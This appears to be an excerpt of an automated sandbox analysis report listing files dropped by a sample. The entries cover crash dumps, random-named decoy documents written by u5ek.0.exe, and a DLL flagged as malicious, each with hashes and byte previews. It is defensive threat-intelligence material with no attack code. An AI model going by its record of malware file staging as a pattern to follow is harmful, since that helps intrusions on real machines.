Entropy (8bit):	2.725323783685602
Encrypted:	false
SSDEEP:	384:TqrGyLF6AgEqYzLNCSY2db4JBOTL9AlrY0:LyLhgEjEShdbEiirY
MD5:	8260995185C794C744DD398CB6561816
SHA1:	DDCE50A837018B9B1A58A8952F68A7A3538F88FB
SHA-256:	8D3E15E1BB15BDEF79B2EA49C7CA28855200F707215BBC299031608B7E740B24
SHA-512:	A6CB683DF702683E65B6154D9AE8CB3754F856A4235FD5D54669B8AFC6BC4C9EE9FF61E4D9CA9BD28E597DF05B0F9E7E80F5CA58FA7FB84F33116A157DC7E09D
Malicious:	false
Preview:	MDMP..a..... .........,f............4............ ..<...........v9..........T.......8...........T...........`Z..b...........((.........................................................................................eJ.............GenuineIntel............T.............,f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER554E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6304
Entropy (8bit):	3.7206516318365965
Encrypted:	false
SSDEEP:	192:R6l7wVeJiT6tXEy8YXXPpDM89bCGsfuWm:R6lXJe6lyYXTClfm
MD5:	670F6BEBD1C4FC419CFFE0D915C2F0DC
SHA1:	BF3354F8280800140FBE0DA770F77C1A31FBC518
SHA-256:	5705BC638BA7BB608A850D0F73A27E316571A02074DF77B9C1A78CDCB961C377
SHA-512:	23A9EAF4CA12450C3C6713493AC08A898A09362B63289EA0EBA72E183F7DD917CA7445085ADC1748D030E3A815D6DC35D2F6D42D4CF8CE319A4C12F6F6ECDD1C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER556E.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.438150937922383
Encrypted:	false
SSDEEP:	48:cvIwWl8zsYJg77aI9BeWpW8VY5jXoYm8M4JVmwVFi+q8uhTRncd9d:uIjfeI77f7VATFJApcd9d
MD5:	F0A4EF625A1B75533DC767AA4FB3B031
SHA1:	D40661D09383CAE1903AB3A09A34D6EB40B8161F
SHA-256:	288B98F7A5DD6DE8C67FA6809ADBA9AAFD064E6AD13F2C52D213EBB224CB21C1
SHA-512:	2CDE43CB85471C43C507100916DA55E768642B6F49E96ECD2B96D4FC92E0D358AC810AD9BF33A0B6525CFDDAAF43BAF66110E57AF907937FCF37865A8FF37220
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297372" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0B9.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Apr 26 21:09:13 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	51039
Entropy (8bit):	2.954821315281418
Encrypted:	false
SSDEEP:	384:H85CNTpm0XiWOfnE1R52rURV/hFN6P7CMzLCddHw:u+g0XiWOfnE1GrBCM6dO
MD5:	3FEC39CDE4919D58CBEE48ACD10873D2
SHA1:	CEED3F2865B483A78B4DFB998C9EECC16315D1C4
SHA-256:	EFA9273F295F2C6A9A5A7D0AAAB64391C34848968E5C9C593D265053FF8E4085
SHA-512:	B92376E86E69FA3E48A87BC74843B961627249CD215A9EC8D7FB08C463DE087F88EDBC79DA82BAD1BFE8AEC1B2F8DF59EED0AC065AC4565A6287816633F516EA
Malicious:	false
Preview:	MDMP..a..... .........,f............4...........H...H.......d....#......T...D?..........`.......8...........T............:..W............(...........*..............................................................................eJ......x+......GenuineIntel............T.......\.....,f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE212.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8398
Entropy (8bit):	3.6962497856011782
Encrypted:	false
SSDEEP:	192:R6l7wVeJlFU6EGj6Y9lSU9eI7Cgmfj8pDQ89bunsfd6m:R6lXJE6EGj6YvSU9eKCgmfj8usfh
MD5:	A08E7EEC2E6FA9E6DE566A155BF38C2D
SHA1:	A924D1A7F0D2AA64750A7F2CC92279FBCD15CE3C
SHA-256:	DA3950899CBD51C2502EBB05F7C5394D24525AC43B20D9CE412895947488696B
SHA-512:	05F007622A15051878B3B289687DC8B73A893B4643000B16C991ABB9CEE7BA12F0F330EE2CB8E2D2F1CF0BFEB0B66DE5F7032C02B0EFE8D89C2291B761878423
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE271.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4680
Entropy (8bit):	4.462710315153584
Encrypted:	false
SSDEEP:	48:cvIwWl8zspJg77aI9BeWpW8VY52PYm8M4J3GtXFG+q8vtGtVe5hMd:uIjf7I77f7VA2SJZKiehMd
MD5:	985248893CC8F1EDE9CD4BBE125CA04B
SHA1:	909F55796315FBD26EDD8C8FE826FCA10D5EC3DE
SHA-256:	F24363611B8E821FF83C325C062FEFE0F500F1245C3E7EB2ED9026FE761B3FF2
SHA-512:	30A394A0B6E13C01C6DA20A9AA6E88C6E97E5DCD70A18CA498FE455F4008E99000089BBE7E84D9ECBB663CB4D09A8DA010DED6DC56B1EB4E43948B615A90BEBA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297371" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\NHPKIZUUSG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.70435191336402
Encrypted:	false
SSDEEP:	24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
MD5:	8C1F71001ABC7FCE68B3F15299553CE7
SHA1:	382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256:	DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512:	8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious:	false
Preview:	NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

C:\ProgramData\NHPKIZUUSG.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.70435191336402
Encrypted:	false
SSDEEP:	24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
MD5:	8C1F71001ABC7FCE68B3F15299553CE7
SHA1:	382285FB69081EB79C936BC4E1BFFC9D4697D881
SHA-256:	DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
SHA-512:	8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
Malicious:	false
Preview:	NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

C:\ProgramData\QNCYCDFIJJ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6980379859154695
Encrypted:	false
SSDEEP:	24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:	4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:	C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:	59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:	DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:	false
Preview:	QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

C:\ProgramData\ZBEDCJPBEY.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\ProgramData\ZBEDCJPBEY.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\ProgramData\ZSSZYEFYMU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698801429970146
Encrypted:	false
SSDEEP:	24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
MD5:	488BC4EF686937916ECE6285266A6075
SHA1:	498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
SHA-256:	8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
SHA-512:	1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
Malicious:	false
Preview:	ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JHqNlw9U8c.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QPoX60yhZt.exe, Detection: malicious, Browse Filename: 3R18jv6iGv.exe, Detection: malicious, Browse Filename: YEnIrzZUUw.exe, Detection: malicious, Browse Filename: bUcIhJ4VHm.exe, Detection: malicious, Browse Filename: w3WOJ1ohgD.exe, Detection: malicious, Browse
